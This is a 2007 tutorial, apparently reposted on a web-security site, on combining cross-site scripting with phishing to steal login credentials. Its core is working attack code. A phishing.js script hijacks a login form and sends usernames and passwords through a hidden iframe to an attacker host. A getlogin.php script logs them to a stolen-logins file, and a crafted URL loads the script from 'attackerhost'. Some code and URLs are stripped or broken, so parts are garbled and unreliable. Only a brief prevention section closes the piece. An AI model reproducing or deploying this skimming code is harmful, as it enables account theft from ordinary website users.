Paper: Applying XSS to Phishing Attacks

Written by Nexus,

Thursday, 3 May 2007

As clearly stated by the author of the following tutorial: "all the techniques and codes provided in this paper are for educational purpose ONLY: this tutorial is free as much you are free not to read it. I'm not responsibile of any use you'll make of these informations, got it? :)".

These techniques are presented together with Proof of Concept (PoC) codes which are actually used by phishers who are knowledgeable about certain aspects of cross-site scripting (XSS) exploitation. This tutorial is a nice read and definately gives you an insight into preventing yourself and the users of your website from falling a victim of phishing attacks and XSS exploitation.

                                 ---------------------------------[ ]---------------------------------

-[ INFOS ]-----------------------------------------------------------------------
Title: "Applying XSS to Phishing Attacks"
Author: Nexus
Date: 2007-04-08 (ISO 8601)

-[ SUMMARY ]---------------------------------------------------------------
0x00: Hello There!
0x01: Introduction
0x02: Commons (and idiots) kinds of Phishing
0x03: Starting from Cross-Site Scripting
0x04: Let's get in action
0x05: Build The Scripts
0x06: Let's Summarize
0x07: Alternatives
0x08: Prevention
0x09: Conclusions

---[ 0x00: Hello There! ]
Hi to everybody right there! :) I'm here again to continue talking with you about the now-a-days security issues of Cross-Site Scripting and now introduce the Phishing attacks.
Perfect! The coffee maker is on the burner, i got some chips and my laptop with Smashing Pumpkins shouting out loud! I'm ready to get on..

Shoutouts: this paper is dedicated to all those websites (even important) which i have mailed informing of Cross-Site Scripting vulnerabilities (and Phishing consequently) in their web applications, and never replied to me: good luck! :)

---[ 0x01: Introduction ]
So.. the today's theme is Phishing! This word came out a lot in these months actually because it's a obvious consequence of recent Cross-Site Scripting abuses.

Just like XSS, the phishing "attacks" (this quoting marks will be explained later) are often understimated by webmasters and web coders in generals, and even for the same reason: it's not an active kind of attack like SQL Injection is.This thoughts are completely wrong, and as recent events prove, they get severely punished ;)

Let's clarify what "Phishing" means..
This word has been used for the first time in 1996 and it represented all that illegal acts that permits an "attacker" (or "phisher") to get private informations in order to gain control on that person electronic identity, using some comunications instruments (like email) and some smart social engineering.

Actually Phishing means quite the same, but it's getting a more definitive shape in the last years with the born of new vulnerabilities just like Cross-Site Scripting which make those frauds easier to accomplish.

---[ 0x02: Commons (and idiots) kinds of Phishing ]
Everybody at least once received a strange email which seems to come from a trusted website (maybe a statal service like the Postal one) which invites to authenticate in the linked page or to submit confidential infos, but that in reality are just some fake mails with quite good ripped layout.

These are just some idiots examples of Phishing attacks attempts: and often are even tagged by the AntiSpam service running on your mail server.

Usually this kinds of Phishing rips the real website graphics in order to make the email more credible, and provide you a crafted url link in which you are invited to submit some infos (for example your login credentials).

An example of link that could be used is like (in an HTML page):
<a href=""></a>

You'd say now "lol, it's just a stupid attempt to make me browse into a website that is not that one proposed": actually.. yes!
It seems really a ridiculous try, but belive me.. there are lot of people who fall in this trap (and if you don't believe me, just visit the proposed stats).

Assuring that, even if it's a really stupid attempt, that tecnique get quite lots of victims.. try to imagine how many problems can create a well builded Phishing attack!

---[ 0x03: Starting from Cross-Site Scripting ]
Ok, i'm not gonna deal again with XSS deeply, if you want some more infos about that just look at my previous Paper at this URL:

(if the url doesn't exists just browse in the Papers directory and  you'll find it for sure)

Now that we clarified a little what Phishing really is, what tha hell XSS concerns with that?? You may ask yourself.
The answer: XSS allows to a smarter (than the previous ones :P) attacker to build up a well defined Phishing attack getting the trusted website really involved and making the attempt of fraud less suspicious and more efficient!

If a website is vulnerable to Cross-Site Scripting it's useless to remind you that is possible to make all JavaScript codes we want to be run! And that's really a great advantage :)

If we (in a figurative way obviously :P) can get any JS to be run, so maybe we could "hijack" that website behaviour and maybe his reaction to common actions too! Uhmmmm..

---[ 0x04: Let's get in action ]
Let's proceed step by step using a simple example to make all cleaner.
So.. we've just said that Phishing if well builded it's a strong attack tecnique and we said also that we can use Cross-Site Scripting to accomplish this "fraud" in a smarter and more effective way.. ok, but how?

Assure that we got the website we want to disfrut for "our" (let me use the first plural person, not for lamering but to simplify my english writing, please XD) purpose: maybe this website is vulnerable to some Cross-Site Scripting in it's code.

Ok, we're lucky.. the website is vulnerable in it's Search Engine (as often) and it permits to execute arbitrary JavaScript code: let's try some simply cheats


Fine! They works out and the website doesn't make any filter on the apexs. It could be useful because, let's take a look to the HTML code of the page:

<!-- hypotetical index.php page -->
<form method="POST" action="somepage.php" name="userslogin">
User: <input type="text" name="user"><br />
Pass: <input type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
<!-- EOF -->

There's a login form and it doesn't seems to be vulnerable to SQL Injection (obviously because if it was this paper got to be already ended :P), we can use the previous found XSS vulnerability in some way.

Here are the informations we need to use:
- there's a login form called "userslogin"
- the user textfield will be "userslogin.user"
- the pass textfield will be "userslogin.pass"

Actually, if the page includes both the Login Form and the Search Engine too, we can try to hijack the submited input datas not to "somepage.php" but to a pre-builded capturing page on some remote host under our control.

The attempt we're going to do is to induce the users to make login into the crafted link we should provide them, and it could be something like:
<script src=""></script>

That encoded will look like:



---[ 0x05: Build The Scripts ]
Now we quite got the idea of what we're going to do, let's note down some code that could be used in the evil phishing.js script.

/* phishing.js */

// Sets the login form name
Form = document.forms["userslogin"];

function stealLogin() {
// Creates a new <iframe> element
var iframe = document.createElement("iframe");
// Force the iframe to be hidden = "none";
// Loads the malicious PHP code into the iframe
iframe.src = ""
     + Form.user.value + "&pass=" + Form.pass.value;

// Append that iframe into the body code

// On users submit action hijacks the infos to the previous function
Form.onsubmit = stealLogin();
/* EOF */

With this code we redirect the submitted login credentials to our script which create an hidden iframe in the page's body and in which is loaded another malicious PHP Script that dump the submitted user and password and saves them somewhere.

That code could something like:

/* getlogin.php */
if(isset($_GET['user']) && isset($_GET['pass'])) {

// Sets the path and opens the dump file
$file_path = "stolenlogins.txt";
$file = @fopen($file_path, "a");

// Generate the string
$string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";

// Writes the datas and close the opened file
@fwrite($file, $string);
/* EOF */

This file is really easy to understand: it simply gets the stolen login user and password and write them down into a dump file.
Combinating these two malicious scripts the attacker can really get important and confidential informations simply exploiting a "little" (as webmasters often define them) vulnerability combined to the possibility of users log into the web application.

---[ 0x06: Let's Summarize ]
We got all the scripts written and working it seems.. let's sum out how the attack
can take place:
- the attacker found a XSS vulnerable website
- the purpose is to steal accounts informations
- the attacker write a JavaScript that hijack the submitted login form input
  to a pre-builded PHP script that dumps the users and passwords it gets
- the attacker provides the crafted XSSed url where users can log in
- the user as it comes log into the system
- the JavaScript get in action and make the PHP script dumps the login
- the attacker stole accounts using the combination of XSS and Phishing.

As we can see it's quite simple to get all these stuff works out well avoiding big problems like building fake login systems on external webservers (which is indeed a big risk factor).

---[ 0x07: Alternatives ]
It can happens that the Cross-Site Scripting vulnerable code doesn't coincide with the login form page, so the attacker needs to force the XSSed page to open up that page and use it afterwards.

Always starting from our crafted url:<script src="http://attackerhost/phishing.js"></script>

We can modify the "phishing.js" script forcing the website to open up the page we want the user to login.

/* phishing.js */
Form = document.forms["userslogin"];

function forceLogin() {
var loginiframe = document.createElement("iframe");
var loginiframe.src = "";

function stealLogin() {
var iframe = document.createElement("iframe"); = "none";
iframe.src = ""
     + Form.user.value + "&pass=" + Form.pass.value;


window.onload = forgeLogin();
Form.onsubmit = stealLogin();
/* EOF */

As you may have noticed this "new version" of phishing.js force the page to load the login page into a new iframe in order to get full control even on different pages. Obviously this code needs to be customized on the trusted site appearance.

---[ 0x08: Prevention ]
Ok, as we actually know how to build up a smart Phishing attack attempt we need to know also how we can prevent to this kind of frauds.
There are not all that much things to do, just be aware of a couple of things:
1- Force your Mail Viewer program to accept only text-plained messages;
2- Check if proposed and effective links coincides;
3- Never browse a website that got encoded characters in his url;
4- Be SURE in what you're going to auth in.

There are also several tools for different browsers to trying avoiding phishing attacks, but they aren't efficient at 100%: it's better to be careful ourselves.

---[ 0x09: Conclusions ]
This is the end of this Paper! :)
It's quite long but i think i written down something that can really be interesting for those of you who are getting involved into web applications security.
Obviously all the techniques and codes provided in this paper are for educational purpose ONLY: this tutorial is free as much you are free not to read it.
I'm not responsibile of any use you'll make of these information, got it? :)

By the way..
I hope that i've got quite well explained deeply what is the actual situation concerning these kinds of vulnerabilities and tecniques!

Stay tuned for upcoming stuff! :D


Original Link to Tutorial:

Share this content:
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.